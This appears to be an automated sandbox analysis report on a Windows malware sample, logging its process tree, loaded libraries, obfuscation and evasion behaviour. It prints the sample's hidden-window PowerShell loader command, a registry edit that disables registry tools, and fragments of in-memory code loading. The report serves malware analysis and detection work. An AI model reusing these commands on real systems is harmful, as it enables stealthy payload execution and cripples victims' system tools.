            Source: dP5z8RpEyQ.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeFile read: C:\Users\user\Desktop\dP5z8RpEyQ.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\dP5z8RpEyQ.exe "C:\Users\user\Desktop\dP5z8RpEyQ.exe"
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
            Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /fJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: dP5z8RpEyQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2632708521.0000000007C58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2632708521.0000000007C83000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2632708521.0000000007C58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2632708521.0000000007C58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdbd source: powershell.exe, 00000002.00000002.2638277451.0000000008D52000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000002.00000002.2638733328.000000000B5D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((accessitenes $Straatagetsaronernes $Knytnvens), (Byvaabnerne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Piratelike = [AppDomain]::CurrentDomain.GetAss
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($udlsningsenhedens)), $Straatagetsrevstemtes).DefineDynamicModule($Studiemssigt52, $false).DefineType($drevnes, $Taxaflys, [System.Mult
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) "
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F3450F push ebp; retf 0007h2_2_04F3451A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F34DBF pushad ; retf 0007h2_2_04F34DDA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F3CE82 push eax; mov dword ptr [esp], edx2_2_04F3CE8C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F310F8 push eax; ret 2_2_04F31132
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F31158 push eax; ret 2_2_04F31162
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F31148 push eax; ret 2_2_04F31152
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F31138 push eax; ret 2_2_04F31142
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E37790 push ebp; retn 3007h2_2_07E37A42
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E376D9 push FFFFFF8Bh; iretd 2_2_07E376DB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E376A0 push FFFFFF8Bh; iretd 2_2_07E376A2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E3659A push FFFFFF8Bh; iretd 2_2_07E365A3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E36561 push FFFFFF8Bh; iretd 2_2_07E3656A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E37463 push FFFFFF8Bh; iretd 2_2_07E37465
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E36289 push FFFFFF8Bh; iretd 2_2_07E3628B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E36250 push FFFFFF8Bh; iretd 2_2_07E36252
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E39099 push FFFFFF8Bh; iretd 2_2_07E3909B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E39060 push FFFFFF8Bh; iretd 2_2_07E39062
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E31EF7 push 0007C253h; retn 0007h2_2_07E31F12
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E38ECA push FFFFFF8Bh; retf 2_2_07E38ECC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E3AA11 push FFFFFF8Bh; iretd 2_2_07E3AA13
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E3A917 push FFFFFF8Bh; iretd 2_2_07E3A919
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E39866 push FFFFFFE8h; iretd 2_2_07E3986D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09714125 push FFFFFFC1h; retf 2_2_09714130
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09711187 push ds; ret 2_2_0971126F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09715064 push FFFFFF9Eh; ret 2_2_09715072
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09711261 push ds; ret 2_2_0971126F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_097122BD pushfd ; retf 2_2_097122C6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09711568 push eax; ret 2_2_0971158A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_097135B7 push 5F74BF95h; ret 2_2_097135BE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0971559B push eax; ret 2_2_097155AE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09714F0A push ecx; retf 2_2_09714F10

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
